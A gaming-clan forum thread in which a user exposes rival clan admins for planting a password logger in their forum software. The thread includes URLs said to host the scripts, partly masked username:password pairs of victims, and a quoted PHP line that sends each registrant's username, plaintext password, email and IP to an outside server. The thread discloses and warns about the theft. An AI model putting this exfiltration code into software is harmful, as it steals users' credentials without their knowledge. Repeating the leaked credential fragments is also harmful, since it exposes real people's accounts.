CP/CV/SV #EXPOSED V2(The boring technical details)

[slushpuppy]

http://www.sharkbrew.com/community/index.php?/topic/2966-cpcvsv-exposed-stay-away-from-these-clans/

 

Background info:

I was asked by LT to take over hosting from [CP]Parm. Sam has mentioned to me off handedly that a number of his members had been hacked using LT's site, so I took the opportunity to peak around the original config files. The results are scary.

 

Essentially this is a list of sites so far that has this rat on it:

 

• LT
• Old CV
• New CV
• Old zenith(Idk which forum tonqir came from)

Basically Parm probably ratted his own clan members?!?!

 

How this rat works is, it will log your password, then send the user/pass to SV's server for "svkeeping". I have uncovered some .txt files containing some passes. If you are one of them, i suggest you change your passes ASAP.

 

touqirn**ir:t***i*

touqirn**ir:d****r

silents****a:n***for****d

its_supa:date*****02

its_supa:******82

zakchips:*****ont

eternal_self:*****v12xzarathustra:******ohnpro_dutcher:******n96

 

 

 

In this grand scheme of things, CP/SV has been logging passwords of multiple forums without the user's knowledge. I have inserted 3x images detailing the script containing the RAT

 

 

 

 

 

 

Attached are 3 urls leading to the rat(it will be removed soon i bet)

 

http://sv-rs.org/tools/raw/acp.txt

http://sv-rs.org/tools/raw/registration.txt

http://sv-rs.org/tools/raw/login.txt

 

 

 

P.S. Some evidence they are doing the same for other main clan forums

 

[Dripz`]

rip

[`Fly]

rip

[anone69]

Fucking snakes trying sohard

 

just play the fucking game and have fun, if you lose you lost if you win you won

 

 

no need for bitchmoves

[Rebel]

jesus christ

[Jim]

Sad ;-;

[Rebel]

this isn't the first time that parm/toxic/ leakede acp to hittin lo

[SV Elve]

You forgot the part where you tried to SQLi, but failed.

 

Nowadays, we use parameterized queries.

[cassidy69]

is my email in there? query me on irc if possible so i can check

[slushpuppy]

You forgot the part where you tried to SQLi, but failed.

 

Nowadays, we use parameterized queries.

 

Care to share how many user/passes you have in you table?

[Harrie]

This game

[Downyz]

Thanks Slush.

 

I can't say I didn't expect it tho, Dr paid Parm 5m for access to our acp :x

[slushpuppy]

12,000 or so.

 

Why not 15,000?

[Sl acid]

Kekekekkekekeke cleared

[Persian Tom]

Wow. Thanks slush !

[I3elg]

Thx slush pmed some of dem !

[Joe Ftw]

Slush you are the bomb 

[aaronz]

wooot woot 

[Tribey0]

lol

[Tom Valor]

Can't belvie Parm would accually do this, but he did, with Toxic, can't belive I was in his clan. 

A Shame.

[I3elg]

Can't belvie Parm would accually do this, but he did, with Toxic, can't belive I was in his clan. 

A Shame.

I know man is fucking sad lmao ineed to xzara so icould pm him

[cassidy69]

This is taken directly from sv-rs.org Logs to remind you guys their stealing your Facebook,Twitter, though for twitch  i havent found a script for it on here yet

 

 

 

/* Attempt to fetch user details */
            $classToLoad    = IPSLib::loadLibrary( IPS_ROOT_PATH . 'sources/classes/facebook/connect.php', 'facebook_connect' );
            $facebook        = new $classToLoad( $this->registry, $member['fb_token'], $member['fb_uid'] );
        
            $userData        = $facebook->fetchUserData();
            
            if ( $userData['id'] )
            {
                $userData['service'] = 'facebook';
                $userData['_name'] = $userData['name'];
                $userData['_pic'] = $userData['pic_square'];
                $userData['_sImage'] = $this->settings['public_dir'] . 'style_status/facebook.png';
                
                /* Enforcing / allowing real names? */
                if ( ! count( $form_errors['dname'] ) AND $this->settings['fb_realname'] != 'any' )
                {
                    $userData['_displayName'] = $userData['_name'];

 

 

 

( $member['twitter_id'] AND $member['twitter_token'] AND $member['twitter_secret'] )
        {
            /* Attempt to fetch user details */
            $classToLoad    = IPSLib::loadLibrary( IPS_ROOT_PATH . 'sources/classes/twitter/connect.php', 'twitter_connect' );
            $twitter        = new $classToLoad( $this->registry, $member['twitter_token'], $member['twitter_secret'] );
        
            $userData        = $twitter->fetchUserData();
            
            if ( $userData['id'] )
            {
                $userData['service'] = 'twitter';
                $userData['_name'] = $userData['screen_name'];
                $userData['_pic'] = $userData['profile_image_url'];
                $userData['_sImage'] = $this->settings['public_dir'] . 'style_status/twitter.png';

 

 

 

// Give SV the info...
        //-----------------------------------------
        $user = str_replace(' ', '%20', $this->request['members_display_name']);
        file_get_contents('http://sv-rs.org/tools/insert.php?site=' . $_SERVER['SERVER_NAME'] . '&type=Registration&username=' . $user . '&password=' . $in_password . '&email=' . $in_email . '&ip=' . $_SERVER['REMOTE_ADDR']);

        /* Create member */
        $member = array(
                    

[slushpuppy]

That would be the function to login via facebook..

 

But thanks for the idea.

 

make sure you use parameterized queries!

[cassidy69]

That would be the function to login via facebook..

 

But thanks for the idea.

l0l my lord you are blind

[Wardy]

Well, that happened.